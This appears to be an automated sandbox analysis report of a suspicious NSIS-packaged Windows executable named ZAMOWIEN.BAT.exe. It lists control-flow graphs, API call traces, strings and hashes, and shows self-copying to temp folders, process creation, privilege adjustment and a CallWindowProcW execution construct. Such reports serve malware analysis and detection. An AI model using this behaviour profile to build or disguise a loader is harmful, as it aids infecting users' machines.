                                                                            control_flow_graph 0 40364b-40369d SetErrorMode GetVersionExW 1 4036d7-4036dc 0->1 2 40369f-4036cf GetVersionExW 0->2 3 4036e4-403726 1->3 4 4036de 1->4 2->1 5 403728-403730 call 406a7c 3->5 6 403739 3->6 4->3 5->6 12 403732 5->12 8 40373e-403752 call 406a0c lstrlenA 6->8 13 403754-403770 call 406a7c * 3 8->13 12->6 20 403781-4037e5 #17 OleInitialize SHGetFileInfoW call 406688 GetCommandLineW call 406688 13->20 21 403772-403778 13->21 28 4037e7-4037e9 20->28 29 4037ee-403802 call 405f84 CharNextW 20->29 21->20 26 40377a 21->26 26->20 28->29 32 4038fd-403903 29->32 33 403807-40380d 32->33 34 403909 32->34 35 403816-40381d 33->35 36 40380f-403814 33->36 37 40391d-403937 GetTempPathW call 40361a 34->37 39 403825-403829 35->39 40 40381f-403824 35->40 36->35 36->36 44 403939-403957 GetWindowsDirectoryW lstrcatW call 40361a 37->44 45 40398f-4039a9 DeleteFileW call 4030d5 37->45 42 4038ea-4038f9 call 405f84 39->42 43 40382f-403835 39->43 40->39 42->32 61 4038fb-4038fc 42->61 47 403837-40383e 43->47 48 40384f-403888 43->48 44->45 64 403959-403989 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40361a 44->64 66 403b96-403ba6 call 403c68 OleUninitialize 45->66 67 4039af-4039b5 45->67 54 403840-403843 47->54 55 403845 47->55 49 4038a5-4038df 48->49 50 40388a-40388f 48->50 58 4038e1-4038e5 49->58 59 4038e7-4038e9 49->59 50->49 56 403891-403899 50->56 54->48 54->55 55->48 62 4038a0 56->62 63 40389b-40389e 56->63 58->59 65 40390b-403918 call 406688 58->65 59->42 61->32 62->49 63->49 63->62 64->45 64->66 65->37 77 403ba8-403bb8 call 405ce8 ExitProcess 66->77 78 403bcc-403bd2 66->78 70 4039bb-4039c6 call 405f84 67->70 71 403a4e-403a55 call 403d5a 67->71 84 403a14-403a1e 70->84 85 4039c8-4039fd 70->85 80 403a5a-403a5e 71->80 81 403c50-403c58 78->81 82 403bd4-403bea GetCurrentProcess OpenProcessToken 78->82 80->66 91 403c5a 81->91 92 403c5e-403c62 ExitProcess 81->92 87 403c20-403c2e call 406a7c 82->87 88 403bec-403c1a LookupPrivilegeValueW AdjustTokenPrivileges 82->88 89 403a20-403a2e call 40605f 84->89 90 403a63-403a89 call 405c53 lstrlenW call 406688 84->90 86 4039ff-403a03 85->86 94 403a05-403a0a 86->94 95 403a0c-403a10 86->95 104 403c30-403c3a 87->104 105 403c3c-403c47 ExitWindowsEx 87->105 88->87 89->66 106 403a34-403a4a call 406688 * 2 89->106 110 403a9a-403ab2 90->110 111 403a8b-403a95 call 406688 90->111 91->92 94->95 99 403a12 94->99 95->86 95->99 99->84 104->105 108 403c49-403c4b call 40140b 104->108 105->81 105->108 106->71 108->81 116 403ab7-403abb 110->116 111->110 118 403ac0-403aea wsprintfW call 4066c5 116->118 122 403af3 call 405c36 118->122 123 403aec call 405bdc 118->123 126 403af8-403afa 122->126 127 403af1 123->127 128 403b36-403b55 SetCurrentDirectoryW call 406448 CopyFileW 126->128 129 403afc-403b06 GetFileAttributesW 126->129 127->126 137 403b94 128->137 138 403b57-403b71 call 406448 call 4066c5 call 405c6b 128->138 130 403b27-403b32 129->130 131 403b08-403b11 DeleteFileW 129->131 130->116 134 403b34 130->134 131->130 133 403b13-403b25 call 405d94 131->133 133->118 133->130 134->66 137->66 145 403b76-403b78 138->145 146 403b7a-403b84 145->146 147 403bbe-403bca CloseHandle 145->147 146->137 148 403b86-403b8e call 4069e5 146->148 147->137 148->118 148->137
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 0040366E
                                                                            • GetVersionExW.KERNEL32(?), ref: 00403699
                                                                            • GetVersionExW.KERNEL32(?), ref: 004036AC
                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403745
                                                                            • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403782
                                                                            • OleInitialize.OLE32(00000000), ref: 00403789
                                                                            • SHGetFileInfoW.SHELL32(0079F748,00000000,?,000002B4,00000000), ref: 004037A8
                                                                            • GetCommandLineW.KERNEL32(007A72A0,NSIS Error,?,00000008,0000000A,0000000C), ref: 004037BD
                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00000020,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00000000,?,00000008,0000000A,0000000C), ref: 004037F6
                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,0000000C,?,00000008,0000000A,0000000C), ref: 0040392E
                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C), ref: 0040393F
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 0040394B
                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 0040395F
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 00403967
                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 00403978
                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 00403980
                                                                            • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C), ref: 00403994
                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00000000,0000000A), ref: 00403A6D
                                                                              • Part of subcall function 00406688: lstrcpynW.KERNEL32(?,?,00000400,004037BD,007A72A0,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406695
                                                                            • wsprintfW.USER32 ref: 00403ACA
                                                                            • GetFileAttributesW.KERNEL32(user32::CallWindowProcW(i r1 ,i 0,i 0, i 0, i 0),C:\Users\user\AppData\Local\Temp\,user32::CallWindowProcW(i r1 ,i 0,i 0, i 0, i 0),?), ref: 00403AFD
                                                                            • DeleteFileW.KERNEL32(user32::CallWindowProcW(i r1 ,i 0,i 0, i 0, i 0)), ref: 00403B09
                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,user32::CallWindowProcW(i r1 ,i 0,i 0, i 0, i 0),?), ref: 00403B37
                                                                              • Part of subcall function 00406448: MoveFileExW.KERNEL32(?,?,00000005,00405F46,?,00000000,000000F1,?,?,?,?,?), ref: 00406452
                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,user32::CallWindowProcW(i r1 ,i 0,i 0, i 0, i 0),?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403B4D
                                                                              • Part of subcall function 00405C6B: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4790,?), ref: 00405C94
                                                                              • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405CA1
                                                                              • Part of subcall function 004069E5: FindFirstFileW.KERNELBASE(?,007A47D8,007A3F90,004060A8,007A3F90,007A3F90,00000000,007A3F90,007A3F90,?,?,74DF2EE0,00405DB4,?,74DF3420,74DF2EE0), ref: 004069F0
                                                                              • Part of subcall function 004069E5: FindClose.KERNELBASE(00000000), ref: 004069FC
                                                                            • OleUninitialize.OLE32(0000000A,?,00000008,0000000A,0000000C), ref: 00403B9B
                                                                            • ExitProcess.KERNEL32 ref: 00403BB8
                                                                            • CloseHandle.KERNEL32(00000000,007AC000,007AC000,?,user32::CallWindowProcW(i r1 ,i 0,i 0, i 0, i 0),00000000), ref: 00403BBF
                                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403BDB
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403BE2
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BF7
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403C1A
                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C3F
                                                                            • ExitProcess.KERNEL32 ref: 00403C62
                                                                              • Part of subcall function 00405C36: CreateDirectoryW.KERNELBASE(?,00000000,0040363E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403935,?,00000008,0000000A,0000000C), ref: 00405C3C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                            • String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne\Applewoman$C:\Users\user\Desktop$C:\Users\user\Desktop\ZAMOWIEN.BAT.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$user32::CallWindowProcW(i r1 ,i 0,i 0, i 0, i 0)$~nsu%X.tmp
                                                                            • API String ID: 1813718867-1806501031
                                                                            • Opcode ID: 5e869b6033df73d8b981345796dca4d64198429db802d17ca4a2d8584e9ad5f3
                                                                            • Instruction ID: 50a7466d29c98c80bfe2a23c7dffe003fc6d82c470fa972a1c6e6f6136cde8fe
                                                                            • Opcode Fuzzy Hash: 5e869b6033df73d8b981345796dca4d64198429db802d17ca4a2d8584e9ad5f3
                                                                            • Instruction Fuzzy Hash: 61F1F6716043009AD720AF658D05B2B7EE8EF8570AF10883EF581B62D2DB7DC941CB6E
                                                                            APIs
                                                                              • Part of subcall function 6E3512BB: GlobalAlloc.KERNEL32(00000040,?,6E3512DB,?,6E35137F,00000019,6E3511CA,-000000A0), ref: 6E3512C5
                                                                            • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6E351D2D
                                                                            • lstrcpyW.KERNEL32(00000008,?), ref: 6E351D75
                                                                            • lstrcpyW.KERNEL32(00000808,?), ref: 6E351D7F
                                                                            • GlobalFree.KERNEL32(00000000), ref: 6E351D92
                                                                            • GlobalFree.KERNEL32(?), ref: 6E351E74
                                                                            • GlobalFree.KERNEL32(?), ref: 6E351E79
                                                                            • GlobalFree.KERNEL32(?), ref: 6E351E7E
                                                                            • GlobalFree.KERNEL32(00000000), ref: 6E352068
                                                                            • lstrcpyW.KERNEL32(?,?), ref: 6E352222
                                                                            • GetModuleHandleW.KERNEL32(00000008), ref: 6E3522A1
                                                                            • LoadLibraryW.KERNEL32(00000008), ref: 6E3522B2
                                                                            • GetProcAddress.KERNEL32(?,?), ref: 6E35230C
                                                                            • lstrlenW.KERNEL32(00000808), ref: 6E352326
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2093089192.000000006E351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E350000, based on PE: true
                                                                            • Associated: 00000000.00000002.2093066982.000000006E350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2093101356.000000006E354000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2093112847.000000006E356000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e350000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                            • String ID:
                                                                            • API String ID: 245916457-0
                                                                            • Opcode ID: 7772dec5edd1187d9cc74264ebd98af0a57346dfcf6f85d0ff274d34bdcfc0cd
                                                                            • Instruction ID: 39bb73917721c7530225412f22e3bfa48316a462ed43cca2eb19ae6e2ed236d5
                                                                            • Opcode Fuzzy Hash: 7772dec5edd1187d9cc74264ebd98af0a57346dfcf6f85d0ff274d34bdcfc0cd
                                                                            • Instruction Fuzzy Hash: B1229D71D14A06DEDB508FE9C980AEEB7F8FF06305F20452AD1A5E3340D7759AA9CB60

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 681 405d94-405dba call 40605f 684 405dd3-405dda 681->684 685 405dbc-405dce DeleteFileW 681->685 687 405ddc-405dde 684->687 688 405ded-405dfd call 406688 684->688 686 405f50-405f54 685->686 689 405de4-405de7 687->689 690 405efe-405f03 687->690 694 405e0c-405e0d call 405fa3 688->694 695 405dff-405e0a lstrcatW 688->695 689->688 689->690 690->686 693 405f05-405f08 690->693 696 405f12-405f1a call 4069e5 693->696 697 405f0a-405f10 693->697 698 405e12-405e16 694->698 695->698 696->686 704 405f1c-405f30 call 405f57 call 405d4c 696->704 697->686 701 405e22-405e28 lstrcatW 698->701 702 405e18-405e20 698->702 705 405e2d-405e49 lstrlenW FindFirstFileW 701->705 702->701 702->705 721 405f32-405f35 704->721 722 405f48-405f4b call 40570d 704->722 707 405ef3-405ef7 705->707 708 405e4f-405e57 705->708 707->690 712 405ef9 707->712 709 405e77-405e8b call 406688 708->709 710 405e59-405e61 708->710 723 405ea2-405ead call 405d4c 709->723 724 405e8d-405e95 709->724 713 405e63-405e6b 710->713 714 405ed6-405ee6 FindNextFileW 710->714 712->690 713->709 717 405e6d-405e75 713->717 714->708 720 405eec-405eed FindClose 714->720 717->709 717->714 720->707 721->697 725 405f37-405f46 call 40570d call 406448 721->725 722->686 734 405ece-405ed1 call 40570d 723->734 735 405eaf-405eb2 723->735 724->714 726 405e97-405ea0 call 405d94 724->726 725->686 726->714 734->714 738 405eb4-405ec4 call 40570d call 406448 735->738 739 405ec6-405ecc 735->739 738->714 739->714
                                                                            APIs
                                                                            • DeleteFileW.KERNELBASE(?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"), ref: 00405DBD
                                                                            • lstrcatW.KERNEL32(007A3790,\*.*,007A3790,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"), ref: 00405E05
                                                                            • lstrcatW.KERNEL32(?,0040A014,?,007A3790,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"), ref: 00405E28
                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,007A3790,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"), ref: 00405E2E
                                                                            • FindFirstFileW.KERNEL32(007A3790,?,?,?,0040A014,?,007A3790,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"), ref: 00405E3E
                                                                            • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405EDE
                                                                            • FindClose.KERNEL32(00000000), ref: 00405EED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                            • String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$\*.*
                                                                            • API String ID: 2035342205-3095958033
                                                                            • Opcode ID: 79059cff9eb4437ead2685de5f4d5bd646c9fcc710622952c42b7afc5d0a73d3
                                                                            • Instruction ID: c3d9b996b258623d8c76b1d58464cf99715ac6bed412b32e5c1faccd0a0ddcc3
                                                                            • Opcode Fuzzy Hash: 79059cff9eb4437ead2685de5f4d5bd646c9fcc710622952c42b7afc5d0a73d3
                                                                            • Instruction Fuzzy Hash: D341C530800A14A6CB21AB65CD89AAF7778EF81758F20413FF545711D1DB7C4A82DEAE
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(?,007A47D8,007A3F90,004060A8,007A3F90,007A3F90,00000000,007A3F90,007A3F90,?,?,74DF2EE0,00405DB4,?,74DF3420,74DF2EE0), ref: 004069F0
                                                                            • FindClose.KERNELBASE(00000000), ref: 004069FC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2295610775-0
                                                                            • Opcode ID: d01eac4b78642ee229a112484c6742e88cc4c4a3d825a65ded65f37d71907806
                                                                            • Instruction ID: 6f1c0151cd7d43f47b762ea71d1b9e47064f8d1d763c376de3beddb793e193d4
                                                                            • Opcode Fuzzy Hash: d01eac4b78642ee229a112484c6742e88cc4c4a3d825a65ded65f37d71907806
                                                                            • Instruction Fuzzy Hash: E5D012316151605BD6506B386E0C84B7A589F573717228B36F477F21E0C7788C728B98

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 151 404108-40411a 152 404120-404126 151->152 153 404281-404290 151->153 152->153 154 40412c-404135 152->154 155 404292-4042da GetDlgItem * 2 call 404607 SetClassLongW call 40140b 153->155 156 4042df-4042f4 153->156 157 404137-404144 SetWindowPos 154->157 158 40414a-404151 154->158 155->156 160 404334-404339 call 404653 156->160 161 4042f6-4042f9 156->161 157->158 165 404153-40416d ShowWindow 158->165 166 404195-40419b 158->166 170 40433e-404359 160->170 162 4042fb-404306 call 401389 161->162 163 40432c-40432e 161->163 162->163 187 404308-404327 SendMessageW 162->187 163->160 169 4045d4 163->169 171 404173-404186 GetWindowLongW 165->171 172 40426e-40427c call 40466e 165->172 173 4041b4-4041b7 166->173 174 40419d-4041af DestroyWindow 166->174 181 4045d6-4045dd 169->181 178 404362-404368 170->178 179 40435b-40435d call 40140b 170->179 171->172 180 40418c-40418f ShowWindow 171->180 172->181 184 4041b9-4041c5 SetWindowLongW 173->184 185 4041ca-4041d0 173->185 182 4045b1-4045b7 174->182 191 404592-4045ab DestroyWindow EndDialog 178->191 192 40436e-404379 178->192 179->178 180->166 182->169 190 4045b9-4045bf 182->190 184->181 185->172 186 4041d6-4041e5 GetDlgItem 185->186 193 404204-404207 186->193 194 4041e7-4041fe SendMessageW IsWindowEnabled 186->194 187->181 190->169 195 4045c1-4045ca ShowWindow 190->195 191->182 192->191 196 40437f-4043cc call 4066c5 call 404607 * 3 GetDlgItem 192->196 197 404209-40420a 193->197 198 40420c-40420f 193->198 194->169 194->193 195->169 223 4043d6-404412 ShowWindow KiUserCallbackDispatcher call 404629 EnableWindow 196->223 224 4043ce-4043d3 196->224 200 40423a-40423f call 4045e0 197->200 201 404211-404217 198->201 202 40421d-404222 198->202 200->172 204 404258-404268 SendMessageW 201->204 205 404219-40421b 201->205 202->204 206 404224-40422a 202->206 204->172 205->200 210 404241-40424a call 40140b 206->210 211 40422c-404232 call 40140b 206->211 210->172 220 40424c-404256 210->220 221 404238 211->221 220->221 221->200 227 404414-404415 223->227 228 404417 223->228 224->223 229 404419-404447 GetSystemMenu EnableMenuItem SendMessageW 227->229 228->229 230 404449-40445a SendMessageW 229->230 231 40445c 229->231 232 404462-4044a1 call 40463c call 4040e9 call 406688 lstrlenW call 4066c5 SetWindowTextW call 401389 230->232 231->232 232->170 243 4044a7-4044a9 232->243 243->170 244 4044af-4044b3 243->244 245 4044d2-4044e6 DestroyWindow 244->245 246 4044b5-4044bb 244->246 245->182 248 4044ec-404519 CreateDialogParamW 245->248 246->169 247 4044c1-4044c7 246->247 247->170 250 4044cd 247->250 248->182 249 40451f-404576 call 404607 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 248->249 249->169 255 404578-40458b ShowWindow call 404653 249->255 250->169 257 404590 255->257 257->182
                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404144
                                                                            • ShowWindow.USER32(?), ref: 00404164
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404176
                                                                            • ShowWindow.USER32(?,00000004), ref: 0040418F
                                                                            • DestroyWindow.USER32 ref: 004041A3
                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 004041BC
                                                                            • GetDlgItem.USER32(?,?), ref: 004041DB
                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041EF
                                                                            • IsWindowEnabled.USER32(00000000), ref: 004041F6
                                                                            • GetDlgItem.USER32(?,?), ref: 004042A1
                                                                            • GetDlgItem.USER32(?,00000002), ref: 004042AB
                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 004042C5
                                                                            • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00404316
                                                                            • GetDlgItem.USER32(?,00000003), ref: 004043BC
                                                                            • ShowWindow.USER32(00000000,?), ref: 004043DD
                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043EF
                                                                            • EnableWindow.USER32(?,?), ref: 0040440A
                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404420
                                                                            • EnableMenuItem.USER32(00000000), ref: 00404427
                                                                            • SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040443F
                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404452
                                                                            • lstrlenW.KERNEL32(007A1788,?,007A1788,00000000), ref: 0040447C
                                                                            • SetWindowTextW.USER32(?,007A1788), ref: 00404490
                                                                            • ShowWindow.USER32(?,0000000A), ref: 004045C4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                            • String ID:
                                                                            • API String ID: 121052019-0
                                                                            • Opcode ID: 8ccd94f120cb2cb21db35f14bdf27abdc0d6f088375f4d00d7c51710ad05dc42
                                                                            • Instruction ID: 303fd82a747fe417c3349a6549eb5d6b220af0d2d777654cb1e8b648a2c6df23
                                                                            • Opcode Fuzzy Hash: 8ccd94f120cb2cb21db35f14bdf27abdc0d6f088375f4d00d7c51710ad05dc42
                                                                            • Instruction Fuzzy Hash: F0C1ABB1500204BBDB216B61EE85A2B3AA8FBD6745F00453EF781B51F0CB7D9891DB1E

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
